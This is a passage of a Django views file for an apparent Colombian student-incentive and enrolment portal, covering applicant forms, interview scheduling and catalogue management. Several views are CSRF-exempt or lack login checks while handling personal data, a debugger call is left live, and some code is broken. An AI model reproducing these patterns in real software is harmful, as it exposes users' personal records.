centrosSena = CentrosSena.objects.all()\n if request.method == 'POST':\n documento = request.POST['busqueda'] #campo de busqueda de documento de estudiantes\n aspirante = FormularioEstimulos.objects.filter(documento = documento)\n if (len(aspirante)>=1): #si ya se inscribio en estimulos\n fechas = Fechas.objects.all() #fechas de agendamiento\n fechasAgendadas = []\n for f in fechas:\n fechasAgendadas.append(f.nombre.id)\n if (aspirante[0].id in fechasAgendadas): #validar si aspirante ya esta agendado\n nombreAgendado = aspirante[0].nombre\n documen = aspirante[0].documento\n return render_to_response('formulario_exitoso.html',{'nombreAgendado' :nombreAgendado, 'documen':documen}, context_instance=RequestContext(request))\n #aspiranteEstimulo = FormularioEstimulos.objects.get(id = aspirante[0].id )\n #import pdb; pdb.set_trace()\n #return render_to_response('editarFormulario.html',{'aspiranteEstimulo':aspiranteEstimulo, 'municipio':municipio, 'universidad':universidad, 'vereda':vereda, 'colegio':colegio, 'sedes':sedes, 'centrosSena':centrosSena }, context_instance=RequestContext(request))\n else: #sino esta gendado enviar a formulario de estimulos\n aspiranteEstimulo = FormularioEstimulos.objects.get(id = aspirante )\n return render_to_response('resultadoBusquedaUsuario.html',{'aspiranteEstimulo':aspiranteEstimulo, 'municipio':municipio, 'universidad':universidad, 'vereda':vereda, 'colegio':colegio, 'sedes':sedes, 'centrosSena':centrosSena }, context_instance=RequestContext(request))\n\n #return render_to_response('estimulos_form.html',{'documento' :documento}, context_instance=RequestContext(request))\n else:\n return render_to_response('estimulos_form.html',{'municipio':municipio, 'universidad':universidad, 'vereda':vereda, 'colegio':colegio, 'sedes':sedes, 'centrosSena':centrosSena,'documento':documento}, context_instance = RequestContext(request))\n return render_to_response('informe.html',context_instance = RequestContext(request))\n\ndef horaEntrevista(request):\n documento = request.POST['docum']\n if request.method == 'POST':\n hora = Horas.objects.all()\n fecha = request.POST['diaMes']\n estudiante = FormularioEstimulos.objects.filter(documento = documento)\n cita = Fechas.objects.filter(fecha = fecha)\n agendados = Fechas.objects.all()\n listAgendados = []\n for age in agendados:\n listAgendados.append(age.nombre_id)\n if ( estudiante[0].id in listAgendados ):\n nombreAgendado = estudiante[0].nombre\n return render_to_response('formulario_exitoso.html',{'nombreAgendado':nombreAgendado}, context_instance = RequestContext(request))\n if ('hora' in request.POST):\n fechas = Fechas()\n fechas.hora_id = request.POST['hora']\n fechas.fecha = request.POST['diaMes']\n fechas.nombre_id = estudiante[0].id\n fechas.save()\n fechaGuarda = Fechas.objects.filter(nombre = estudiante[0].id)\n nombreGuardado = fechaGuarda[0].nombre.nombre\n diaGuardado = fechaGuarda[0].fecha\n horaGuardada = fechaGuarda[0].hora.hora\n\n return render_to_response('formulario_exitoso.html',{'nombreGuardado':nombreGuardado, 'diaGuardado':diaGuardado, 'horaGuardada':horaGuardada, 'documen':documento },context_instance = RequestContext(request))\n\n@csrf_exempt\ndef fechaEntrevista(request):\n documento = request.POST['doc']\n if request.method == 'POST':\n hora = Horas.objects.all()\n fecha = request.POST['dia']\n if fecha != '2018-02-18':\n cita = Fechas.objects.filter(fecha = fecha)\n horasOcupadas = []\n horasOcupadasDisp = []\n for h in range(len(hora)):\n cadaHora = hora[h].id\n for c in range(len(cita)):\n if (cadaHora==cita[c].hora_id):\n horasOcupadas.append(cadaHora)\n for elemento in horasOcupadas:\n if horasOcupadas.count(elemento) > 2:\n horasOcupadasDisp.append(elemento)\n lista_nueva = []\n for i in hora:\n x = i.id\n if (x not in horasOcupadasDisp):\n lista_nueva.append(i)\n print (horasOcupadas)\n print(\"--------------------------\")\n print (horasOcupadasDisp)\n return render_to_response('formulario_exitoso.html',{ \"lista_nueva\": lista_nueva, \"documento\":documento, 'fecha':fecha }, context_instance = RequestContext(request))\n return render_to_response('formulario_exitoso.html',{\"documento\": documento}, context_instance = RequestContext(request))\n return render_to_response('formulario_exitoso.html', context_instance = RequestContext(request))\n\n@csrf_exempt\ndef editaFechaEntrevista(request):\n documento = request.POST['doc']\n pk = request.POST['agendado']\n hora = Horas.objects.all()\n fecha = request.POST['dia']\n if fecha != '2018-02-18':\n cita = Fechas.objects.filter(fecha = fecha)\n horasOcupadas = []\n horasOcupadasDisp = []\n for h in range(len(hora)):\n cadaHora = hora[h].id\n for c in range(len(cita)):\n if (cadaHora==cita[c].hora_id):\n horasOcupadas.append(cadaHora)\n for elemento in horasOcupadas:\n if horasOcupadas.count(elemento) > 2:\n horasOcupadasDisp.append(elemento)\n lista_nueva = []\n for i in hora:\n x = i.id\n if (x not in horasOcupadasDisp):\n lista_nueva.append(i)\n print (horasOcupadas)\n print(\"--------------------------\")\n print (horasOcupadasDisp)\n return render_to_response('editaAgenda.html',{ \"lista_nueva\": lista_nueva,\"pk\":pk, \"documento\":documento, 'fecha':fecha }, context_instance = RequestContext(request))\n return render_to_response('editaAgenda.html',{\"documento\": documento}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef estimulos(request):\n sisben = Sisben.objects.all()\n estrato = Estrato.objects.all()\n municipio = Municipios.objects.all().order_by()\n universidad = Universidades.objects.all()\n vereda = Veredas.objects.all()\n colegio = Colegios.objects.all()\n sedes = Sedes.objects.all()\n centrosSena = CentrosSena.objects.all()\n video = get_object_or_404(Video, pk=1)\n codigo = 1000\n if request.method == 'POST':\n documento = request.POST['4Documento']\n aspirante = FormularioEstimulos.objects.filter(documento = documento)\n if (len(aspirante)>=1):\n return render_to_response('formulario_exitoso.html',{'documento' :documento}, context_instance=RequestContext(request))\n else:\n formularioEstimulos = FormularioEstimulos()\n formularioEstimulos.nombre = request.POST['1Nombres']\n formularioEstimulos.apellido = request.POST['2Apellidos']\n formularioEstimulos.tipoDocumento = request.POST['3Tipo_documento']\n formularioEstimulos.documentoOtro = request.POST['documentoOtro']\n formularioEstimulos.documento = request.POST['4Documento']\n formularioEstimulos.email = request.POST['5Email']\n formularioEstimulos.celular = request.POST['6Celular']\n formularioEstimulos.genero = request.POST['7Genero']\n formularioEstimulos.edad = request.POST['8Edad']\n formularioEstimulos.estadoCivil = request.POST['9Estado_civil']\n formularioEstimulos.cabezaFamilia = request.POST['10Cabeza_familia']\n formularioEstimulos.hijos = request.POST['hijos']\n formularioEstimulos.pertenencia = request.POST['11pertenencia']\n formularioEstimulos.pertenenciaOtro = request.POST['pertenenciaOtro']\n formularioEstimulos.direccionEstudiante = request.POST['12DireEstudiante']\n formularioEstimulos.ciudadEstudiante = request.POST['Ciudad_estudiante']\n formularioEstimulos.barrioEstudiante = request.POST['Barrio_vereda_estudiante']\n formularioEstimulos.ubicacionEstudiante = request.POST['Ubicacion_residencia_estudiante']\n formularioEstimulos.vivienda = request.POST['13Vivienda']\n formularioEstimulos.estrato = request.POST['14Estrato']\n formularioEstimulos.sisben = request.POST['15SISBEN']\n formularioEstimulos.nucleoFamiliar = request.POST['16Nucleo_familiar']\n formularioEstimulos.direccionPadres = request.POST['17DirePadres']\n formularioEstimulos.ciudadPadres = request.POST['Ciudad_padres']\n formularioEstimulos.barrioPadres = request.POST['Barrio_vereda_padres']\n formularioEstimulos.ubicacionPadres = request.POST['Ubicacion_padres']\n formularioEstimulos.serviciosPublicos = request.POST.getlist('18servicios_publicos[]')\n formularioEstimulos.dependenciaEconomica = request.POST['19dependencia_economica']\n formularioEstimulos.dependenciaOtro = request.POST['dependenciaOtro']\n formularioEstimulos.ingresosFamilia = request.POST['20Ingresos_familia']\n formularioEstimulos.colegio = request.POST['21colegio']\n formularioEstimulos.oficialPrivado = request.POST['22Oficial_privado']\n formularioEstimulos.anoTerminacion = request.POST['23ano_terminacion']\n formularioEstimulos.actaGrado = request.POST['actaGrado']\n formularioEstimulos.universidad = request.POST['24Universidad']\n formularioEstimulos.centrosSena = request.POST['centrosSena']\n\n formularioEstimulos.sede = request.POST['25Sede']\n formularioEstimulos.acreditacionUniversidad = request.POST['26AcreditaUniversidad']\n formularioEstimulos.carrera = request.POST['27Carrera']\n formularioEstimulos.tecnicaTecnologica = request.POST['tecnicaTecnologica']\n formularioEstimulos.acreditacionCarrera = request.POST['28AcreditaCarrera']\n formularioEstimulos.cicloEducacion = request.POST['29ciclo_educacion']\n formularioEstimulos.semestreEnCurso = request.POST['semestreEnCurso']\n formularioEstimulos.modalidad = request.POST['30Modalidad']\n formularioEstimulos.modalidadOtro = request.POST['modalidadOtro']\n formularioEstimulos.propedeutico = request.POST['31propedeuticos']\n formularioEstimulos.propedeuticoOtro = request.POST['propedeuticoOtro']\n formularioEstimulos.valorMatricula = request.POST['32Valor_matricula']\n formularioEstimulos.beneficiarioprogramas = request.POST['33beneficiario_programas']\n formularioEstimulos.programaOtro = request.POST['programaOtro']\n formularioEstimulos.incentivoEducativo = request.POST['34incentivo_educativo']\n formularioEstimulos.cuantasVeces = request.POST['cuantasVeces']\n formularioEstimulos.extraAcademicas = request.POST['35extra-academicas']\n formularioEstimulos.extraAcademicaPaga = request.POST['36extra_academicas_pagan']\n formularioEstimulos.parentesco1 = request.POST.getlist('parentesco1')\n formularioEstimulos.parentesco2 = request.POST.getlist('parentesco2')\n formularioEstimulos.parentesco3 = request.POST.getlist('parentesco3')\n formularioEstimulos.parentesco4 = request.POST.getlist('parentesco4')\n formularioEstimulos.parentesco5 = request.POST.getlist('parentesco5')\n formularioEstimulos.parentesco6 = request.POST.getlist('parentesco6')\n formularioEstimulos.parentesco7 = request.POST.getlist('parentesco7')\n formularioEstimulos.totalObtenido = 0\n formularioEstimulos.save()\n documento = request.POST['4Documento']\n nombre = request.POST['1Nombres']\n return render_to_response('formulario_exitoso.html',{'codigo':codigo, 'documento':documento, 'nombre':nombre}, context_instance = RequestContext(request))\n return render_to_response('plataformacerrada.html',{'municipio':municipio, 'universidad':universidad, 'vereda':vereda, 'colegio':colegio, 'sedes':sedes, 'centrosSena':centrosSena, 'video':video}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef docentes(request):\n\n if request.method == 'POST':\n validators = Validator(request.POST)\n validators.required = ['nombre','apellido','documento','email']\n if validators.is_valid():\n docentes = docente()\n docentes.nombres = request.POST['nombre']\n docentes.apellidos = request.POST['apellido']\n docentes.documento = request.POST['documento']\n docentes.email = request.POST['email']\n docentes.asignatura = request.POST['asignatura']\n docentes.contacto = request.POST['contacto']\n docentes.save()\n print(docentes.nombres)\n else:\n return render_to_response('docentes.html', {'error': validator.getMessage() } , context_instance = RequestContext(request))\n return render_to_response('docentes.html',context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef matriculas(request):\n grad = Grado.objects.all()\n grupo = Grupos2.objects.all()\n estrato = Estrato.objects.all()\n instituciones = Inst_educativas2.objects.all()\n sedes = SedeInstitucion2.objects.all()\n veredas = Veredas.objects.all()\n\n if request.method == 'POST':\n #validators = Validator(request.POST)\n #validators.required = ['nombre','apellido','Documento','7Genero','7Genero','15SISBEN','14Estrato','trasporte','12DireEstudiante','familias','alimentacion','desplazado','contacto','dia','email','credo']\n #if validators.is_valid():\n alumno = Alumno2()\n alumno.procedencia_id = request.POST['procedencia']\n alumno.institucion_id = request.POST['institucion']\n alumno.sede_id = request.POST['sede']\n alumno.nombres = request.POST['nombre']\n alumno.apellidos = request.POST['apellido']\n alumno.documento = request.POST['Documento']\n alumno.grado_id = request.POST['grado']\n alumno.genero= request.POST['7Genero']\n alumno.sisben = request.POST['15SISBEN']\n alumno.estrato_id = request.POST['14Estrato']\n alumno.transporte = request.POST['trasporte']\n alumno.direccion = request.POST['12DireEstudiante']\n alumno.familias = request.POST['familias']\n alumno.alimentacion = request.POST['alimentacion']\n alumno.desplazado = request.POST['desplazado']\n alumno.contacto = request.POST['6Celular']\n alumno.nacimiento = request.POST['dia']\n alumno.email = request.POST['email']\n alumno.credo = request.POST['credo']\n alumno.save()\n print(alumno.nombres)\n return render_to_response('matriculas.html', {'gradoss':grad,'estrato':estrato, 'instituciones':instituciones, 'sedes':sedes, 'grupo':grupo, 'veredas':veredas } ,context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef actualiza_alumnos(request):\n import pdb; pdb.set_trace()\n pk = request.POST['pk']\n alumno = get_object_or_404(Alumno, pk=pk)\n if request.method == 'POST':\n validators = Validator(request.POST)\n validators.required = ['nombre','apellido','documento','grado','genero','sisben','estrato','trasporte','direccion','familias','alimentacion','desplazado','contacto','nacimiento','email','credo']\n if validators.is_valid():\n alumno.nombres = request.POST['nombre']\n alumno.apellidos = request.POST['apellido']\n alumno.documento = request.POST['documento']\n alumno.grado_id = request.POST['grado']\n alumno.genero= request.POST['genero']\n alumno.sisben = request.POST['sisben']\n alumno.estrato_id = request.POST['estrato']\n alumno.transporte = request.POST['trasporte']\n alumno.direccion = request.POST['direccion']\n alumno.familias = request.POST['familias']\n alumno.alimentacion = request.POST['alimentacion']\n alumno.desplazado = request.POST['desplazado']\n alumno.contacto = request.POST['contacto']\n alumno.nacimiento = request.POST['nacimiento']\n alumno.email = request.POST['email']\n alumno.credo = request.POST['credo']\n alumno.save()\n return render_to_response('busquedas_alumnos.html',context_instance=RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef portada(request):\n if 'matricula' in request.GET.keys():\n return render_to_response('index.html',context_instance = RequestContext(request))\n if 'usuario' in request.GET.keys():\n return render_to_response('formulario.html',context_instance = RequestContext(request))\n if 'doce' in request.GET.keys():\n return render_to_response('docentes.html',context_instance = RequestContext(request))\n return render_to_response('portada.html',context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef busquedas(request):\n return render_to_response('busquedas.html',context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef esti_form(request):\n return render_to_response('inicio.html',context_instance = RequestContext(request))\n\ndef salidaPdf(request):\n def funcion( * args, ** kwargs):\n html = f ( * args, ** kwargs)\n result = StringIO() #creamos una instancia del un objeto StringIO para\n pdf = pisa.pisaDocument( html , result) # convertimos en pdf la template\n return HttpResponse(result.getvalue(), content_type='application/pdf')\n return funcion\n\n@login_required(login_url = \"/login\")\n#@salidaPdf\ndef busqueda_docente(request):\n docent = None\n buscar = None\n if 'captar' in request.GET.keys():\n buscar = request.GET\n ['dato']\n #qset = (Q(documento__icontains=buscar) )\n qset = ( Q( documento__icontains = buscar) |\n Q( nombres__icontains = buscar) |\n Q( apellidos__icontains = buscar)\n )\n docent = docente.objects.filter(qset).first()\n print(buscar)\n return render_to_response('busqueda_docente.html', {'docente': docent, 'filtro': buscar},context_instance=RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef busquedas_alumnos(request):\n if request.method == 'POST':\n identificacion = request.POST['busqueda']\n aspirante = FormularioEstimulos.objects.filter(documento = identificacion)\n if (len(aspirante)>=1):\n return render_to_response('resultadobusqueda.html',{'aspirante':aspirante}, context_instance=RequestContext(request))\n alumno = Alumno2.objects.filter(documento = identificacion)\n if (len(alumno)>=1):\n return render_to_response('resultadobusqueda.html',{'alumno':alumno}, context_instance=RequestContext(request))\n else:\n return render_to_response('noresultados.html',context_instance=RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef editarBusqueda(request, pk):\n municipio = Municipios.objects.all().order_by()\n universidad = Universidades.objects.all()\n vereda = Veredas.objects.all()\n colegio = Colegios.objects.all()\n sedes = Sedes.objects.all()\n centrosSena = CentrosSena.objects.all()\n aspiranteEstimulo = FormularioEstimulos.objects.get(id = pk )\n if request.method == 'POST':\n formulario = get_object_or_404(FormularioEstimulos, pk=pk)\n formulario.nombre = request.POST['1Nombres']\n formulario.apellido = request.POST['2Apellidos']\n formulario.tipoDocumento = request.POST['3Tipo_documento']\n formulario.documentoOtro = request.POST['documentoOtro']\n formulario.documento = request.POST['4Documento']\n formulario.email = request.POST['5Email']\n formulario.celular = request.POST['6Celular']\n formulario.genero = request.POST['7Genero']\n formulario.edad = request.POST['8Edad']\n formulario.estadoCivil = request.POST['9Estado_civil']\n formulario.cabezaFamilia = request.POST['10Cabeza_familia']\n formulario.hijos = request.POST['hijos']\n formulario.pertenencia = request.POST['11pertenencia']\n formulario.pertenenciaOtro = request.POST['pertenenciaOtro']\n formulario.direccionEstudiante = request.POST['12DireEstudiante']\n formulario.ciudadEstudiante = request.POST['Ciudad_estudiante']\n formulario.barrioEstudiante = request.POST['Barrio_vereda_estudiante']\n formulario.ubicacionEstudiante = request.POST['Ubicacion_residencia_estudiante']\n formulario.vivienda = request.POST['13Vivienda']\n formulario.estrato = request.POST['14Estrato']\n formulario.sisben = request.POST['15SISBEN']\n formulario.nucleoFamiliar = request.POST['16Nucleo_familiar']\n formulario.direccionPadres = request.POST['17DirePadres']\n formulario.ciudadPadres = request.POST['Ciudad_padres']\n formulario.barrioPadres = request.POST['Barrio_vereda_padres']\n formulario.ubicacionPadres = request.POST['Ubicacion_padres']\n formulario.dependenciaEconomica = request.POST['19dependencia_economica']\n formulario.dependenciaOtro = request.POST['dependenciaOtro']\n formulario.ingresosFamilia = request.POST['20Ingresos_familia']\n formulario.colegio = request.POST['21colegio']\n formulario.oficialPrivado = request.POST['22Oficial_privado']\n formulario.anoTerminacion = request.POST['23ano_terminacion']\n formulario.actaGrado = request.POST['actaGrado']\n formulario.universidad = request.POST['24Universidad']\n formulario.centrosSena = request.POST['centrosSena']\n\n formulario.sede = request.POST['25Sede']\n formulario.acreditacionUniversidad = request.POST['26AcreditaUniversidad']\n formulario.carrera = request.POST['27Carrera']\n formulario.tecnicaTecnologica = request.POST['tecnicaTecnologica']\n formulario.acreditacionCarrera = request.POST['28AcreditaCarrera']\n formulario.cicloEducacion = request.POST['29ciclo_educacion']\n formulario.semestreEnCurso = request.POST['semestreEnCurso']\n formulario.modalidad = request.POST['30Modalidad']\n formulario.modalidadOtro = request.POST['modalidadOtro']\n formulario.propedeutico = request.POST['31propedeuticos']\n formulario.propedeuticoOtro = request.POST['propedeuticoOtro']\n formulario.valorMatricula = request.POST['32Valor_matricula']\n formulario.beneficiarioprogramas = request.POST['33beneficiario_programas']\n formulario.programaOtro = request.POST['programaOtro']\n formulario.incentivoEducativo = request.POST['34incentivo_educativo']\n formulario.cuantasVeces = request.POST['cuantasVeces']\n formulario.extraAcademicas = request.POST['35extra-academicas']\n formulario.extraAcademicaPaga = request.POST['36extra_academicas_pagan']\n formulario.parentesco1 = request.POST.getlist('parentesco1')\n formulario.parentesco2 = request.POST.getlist('parentesco2')\n formulario.parentesco3 = request.POST.getlist('parentesco3')\n formulario.parentesco4 = request.POST.getlist('parentesco4')\n formulario.parentesco5 = request.POST.getlist('parentesco5')\n formulario.parentesco6 = request.POST.getlist('parentesco6')\n formulario.parentesco7 = request.POST.getlist('parentesco7')\n formulario.totalObtenido = request.POST.getlist('puntajeObtenido')\n formulario.save()\n documento = request.POST['4Documento']\n trazabilidad(request, documento)\n nombre = request.POST['1Nombres']\n nombreAgendado = request.POST['1Nombres']\n documento = documento\n return render_to_response('formulario_exitoso.html',{'nombreAgendado' :nombreAgendado, 'documen':documento}, context_instance=RequestContext(request))\n\n return render_to_response('editarFormulario.html',{'aspiranteEstimulo':aspiranteEstimulo, 'municipio':municipio, 'universidad':universidad, 'vereda':vereda, 'colegio':colegio, 'sedes':sedes, 'centrosSena':centrosSena }, context_instance=RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef busquedasIncentivos(request):\n estrato = Estrato.objects.filter()\n grado = Grado.objects.filter()\n if request.method == 'POST':\n buscar=None\n alum=None\n buscar=request.POST['busqueda']\n #qset = (Q(documento__icontains=buscar) )\n qset = ( Q( documento = buscar) |\n Q( nombres = buscar) |\n Q( apellidos = buscar)\n )\n alum = Alumno.objects.filter(qset).first()\n print (alum)\n return render_to_response('formulario_exitoso.html',context_instance=RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef editaBusqAgenda(request):\n horas = Horas.objects.all()\n if request.method == 'POST':\n pk = request.POST['agendado']\n documento = request.POST['documento']\n if request.POST.get('hora'):\n fecha = get_object_or_404(Fechas, pk=pk)\n fecha.fecha = request.POST['diaMes']\n fecha.hora_id = request.POST['hora']\n fecha.nombre_id = request.POST['documento']\n fecha.save()\n nombreGuardado = fecha.nombre.nombre\n diaGuardado = fecha.fecha\n horaGuardada = fecha.hora.hora\n documen = fecha.nombre.documento\n return render_to_response('agendaExitosa.html',{'documen':documen, 'nombreGuardado':nombreGuardado, 'diaGuardado':diaGuardado, 'horaGuardada':horaGuardada}, context_instance = RequestContext(request))\n return render_to_response('editaAgenda.html',{'horas':horas, 'pk':pk, 'documento':documento}, context_instance = RequestContext(request))\n return render_to_response('editaAgenda.html', context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef configuracion(request):\n cita = Fechas.objects.all()\n if request.method == 'POST':\n if 'actualiza' in request._post.keys():\n docentes = docente.objects.get(id=request.user.id)\n docentes.nombres = request.POST['nombre']\n docentes.apellidos = request.POST['apellido']\n docentes.documento = request.POST['documento']\n docentes.email = request.POST['email']\n docentes.asignatura = request.POST['asignatura']\n docentes.contacto = request.POST['contacto']\n docentes.save()\n return render_to_response('actualiza_docentes.html',{'docente':docentes},context_instance = RequestContext(request))\n return render_to_response('configuracionEstimulos.html',{'cita':cita}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef logout(request):\n auth.logout(request)\n return HttpResponseRedirect(\"/login\")\n\nfrom django.db.models import Q\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.http import Http404\n\n@login_required(login_url = \"/login\")\ndef municipios(request):\n municipios = Municipios.objects.all()\n if request.method == 'POST':\n municipio = Municipios()\n municipio.municipio = request.POST['municipio']\n municipio.save()\n return render_to_response('municipios.html',{'municipios':municipios}, context_instance = RequestContext(request))\n return render_to_response('municipios.html',{'municipios':municipios}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef editarMunicipio(request, pk):\n municipio = get_object_or_404(Municipios, pk=pk)\n if request.method == 'POST':\n municipio = get_object_or_404(Municipios, pk=pk)\n municipio.municipio = request.POST['municipio']\n municipio.save()\n municipios = Municipios.objects.all()\n return render_to_response('municipios.html',{'municipios':municipios}, context_instance = RequestContext(request))\n return render_to_response('editarMunicipio.html',{'municipio':municipio}, context_instance = RequestContext(request))\n\n@permission_required('Municipios.can_delete_Municipios', login_url = '/login')\ndef eliminarMunicipio(request, pk):\n municipio = get_object_or_404(Municipios, pk=pk)\n if request.method == 'POST':\n municipio.delete()\n municipios = Municipios.objects.all()\n return render_to_response('municipios.html',{'municipios':municipios}, context_instance = RequestContext(request))\n return render_to_response('eliminarMunicipio.html',{'municipio':municipio}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef veredas(request):\n veredas = Veredas.objects.all()\n if request.method == 'POST':\n vereda = Veredas()\n vereda.vereda = request.POST['vereda']\n vereda.save()\n return render_to_response('veredas.html',{'veredas':veredas}, context_instance = RequestContext(request))\n return render_to_response('veredas.html',{'veredas':veredas}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef editarVereda(request, pk):\n vereda = get_object_or_404(Veredas, pk=pk)\n if request.method == 'POST':\n vereda = get_object_or_404(Veredas, pk=pk)\n vereda.vereda = request.POST['vereda']\n vereda.save()\n veredas = Veredas.objects.all()\n return render_to_response('veredas.html',{'veredas':veredas}, context_instance = RequestContext(request))\n return render_to_response('editarVereda.html',{'vereda':vereda}, context_instance = RequestContext(request))\n\n@permission_required('Veredas.can_delete_Veredas', login_url = '/login')\ndef eliminarVereda(request, pk):\n vereda = get_object_or_404(Veredas, pk=pk)\n if request.method == 'POST':\n vereda.delete()\n veredas = Veredas.objects.all()\n return render_to_response('veredas.html',{'veredas':veredas}, context_instance = RequestContext(request))\n return render_to_response('eliminarVereda.html',{'vereda':vereda}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef universidades(request):\n universidades = Universidades.objects.all()\n if request.method == 'POST':\n universidades = Universidades()\n universidades.universidad = request.POST['universidad']\n universidades.save()\n return render_to_response('universidades.html',{'universidades':universidades}, context_instance = RequestContext(request))\n return render_to_response('universidades.html',{'universidades':universidades},context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef editarUniversidad(request, pk):\n universidad = get_object_or_404(Universidades, pk=pk)\n if request.method == 'POST':\n universidad = get_object_or_404(Universidades, pk=pk)\n universidad.universidad = request.POST['universidad']\n universidad.save()\n universidades = Universidades.objects.all()\n return render_to_response('universidades.html',{'universidades':universidades}, context_instance = RequestContext(request))\n return render_to_response('editarUniversidad.html',{'universidad':universidad}, context_instance = RequestContext(request))\n\n@permission_required('Universidades.can_delete_Universidades', login_url = '/login')\ndef eliminarUniversidad(request, pk):\n universidad = get_object_or_404(Universidades, pk=pk)\n if request.method == 'POST':\n universidad.delete()\n universidades = Universidades.objects.all()\n return render_to_response('universidades.html',{'universidades':universidades}, context_instance = RequestContext(request))\n return render_to_response('eliminarUniversidad.html',{'universidad':universidad}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef colegios(request):\n colegios = Colegios.objects.all()\n if request.method == 'POST':\n colegio = Colegios()\n colegio.colegio = request.POST['colegio']\n colegio.save()\n return render_to_response('colegios.html',{'colegios':colegios}, context_instance = RequestContext(request))\n return render_to_response('colegios.html',{'colegios':colegios}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef editarColegio(request, pk):\n colegio = get_object_or_404(Colegios, pk=pk)\n if request.method == 'POST':\n colegio = get_object_or_404(Colegios, pk=pk)\n colegio.colegio = request.POST['colegio']\n colegio.save()\n colegios = Colegios.objects.all()\n return render_to_response('colegios.html',{'colegios':colegios}, context_instance = RequestContext(request))\n return render_to_response('editarColegio.html',{'colegio':colegio}, context_instance = RequestContext(request))\n\n@permission_required('Colegios.can_delete_Colegios', login_url = '/login')\ndef eliminarColegio(request, pk):\n colegio = get_object_or_404(Colegios, pk=pk)\n if request.method == 'POST':\n colegio.delete()\n colegios = Colegios.objects.all()\n return render_to_response('colegios.html',{'colegios':colegios}, context_instance = RequestContext(request))\n return render_to_response('eliminarColegio.html',{'colegio':colegio}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef centrosSena(request):\n centrosSena = CentrosSena.objects.all()\n if request.method == 'POST':\n centroSena = CentrosSena()\n centroSena.centroSena = request.POST['centroSena']\n centroSena.save()\n return render_to_response('centrosSena.html',{'centrosSena':centrosSena}, context_instance = RequestContext(request))\n return render_to_response('centrosSena.html',{'centrosSena':centrosSena}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef editarCentrosSena(request, pk):\n centroSena = get_object_or_404(CentrosSena, pk=pk)\n if request.method == 'POST':\n centroSena = get_object_or_404(CentrosSena, pk=pk)\n centroSena.centroSena = request.POST['centroSena']\n centroSena.save()\n centrosSena = CentrosSena.objects.all()\n return render_to_response('centrosSena.html',{'centrosSena':centrosSena}, context_instance = RequestContext(request))\n return render_to_response('editarCentroSena.html',{'centroSena':centroSena}, context_instance = RequestContext(request))\n\n@permission_required('CentrosSena.can_delete_CentrosSena', login_url = '/login')\ndef eliminarCentrosSena(request, pk):\n centroSena = get_object_or_404(CentrosSena, pk=pk)\n if request.method == 'POST':\n centroSena.delete()\n centrosSena = CentrosSena.objects.all()\n return render_to_response('centrosSena.html',{'centrosSena':centrosSena}, context_instance = RequestContext(request))\n return render_to_response('eliminarCentroSena.html',{'centroSena':centroSena}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef sedes(request):\n sedes = Sedes.objects.all()\n if request.method == 'POST':\n sede = Sedes()\n sede.sede = request.POST['sedes']\n sede.save()\n return render_to_response('sedes.html',{'sedes':sedes}, context_instance = RequestContext(request))\n return render_to_response('sedes.html',{'sedes':sedes}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef editarSedeUni(request, pk):\n sede = get_object_or_404(Sedes, pk=pk)\n if request.method == 'POST':\n sede = get_object_or_404(Sedes, pk=pk)\n sede.sede = request.POST['sede']\n sede.save()\n sedes = Sedes.objects.all()\n return render_to_response('sedes.html',{'sedes':sedes}, context_instance = RequestContext(request))\n return render_to_response('editarSedeUniversidad.html',{'sede':sede}, context_instance = RequestContext(request))\n\n@permission_required('Sedes.can_delete_Sedes', login_url = '/login')\ndef eliminarSedeUni(request, pk):\n sede = get_object_or_404(Sedes, pk=pk)\n if request.method == 'POST':\n sede.delete()\n sedes = Sedes.objects.all()\n return render_to_response('sedes.html',{'sedes':sedes}, context_instance = RequestContext(request))\n return render_to_response('eliminarSedeUniversidad.html',{'sede':sede}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef video(request):\n video = get_object_or_404(Video, pk=1)\n if request.method == 'POST':\n video = get_object_or_404(Video, pk=1)\n video.video = request.POST['video']\n video.save()\n return render_to_response('video.html',{'video':video}, context_instance = RequestContext(request))\n return render_to_response('video.html',{'video':video}, context_instance = RequestContext(request))\n\ndef salidaPdf(f):\n\n def funcion(*args, **kwargs):\n html = f(*args, **kwargs)\n result = StringIO() #creamos una instancia del un objeto StringIO para\n pdf = pisa.pisaDocument( html , result) # convertimos en pdf la template\n return HttpResponse(result.getvalue(), content_type='application/pdf')\n return funcion\n\n\n@salidaPdf\ndef reporte(request):\n if request.method == 'POST':\n documento = request.POST['doc']\n data = FormularioEstimulos.objects.filter(documento=documento).first()\n return render_to_string('reporteincentivo.html',{'data':data})\n\n@csrf_exempt\ndef listaEntrevista(request):\n\n horas = Horas.objects.all()\n if request.method == 'POST':\n if request.POST['busca'] != \"\":\n identificacion = request.POST['busca']\n aspirante = FormularioEstimulos.objects.filter(documento = identificacion)\n if (len(aspirante)>=1):\n agendado = aspirante[0].id\n print (agendado)\n agendadoFecha = Fechas.objects.filter(nombre = agendado)\n agendadoDatos = agendadoFecha[0]\n print (agendadoFecha)\n return 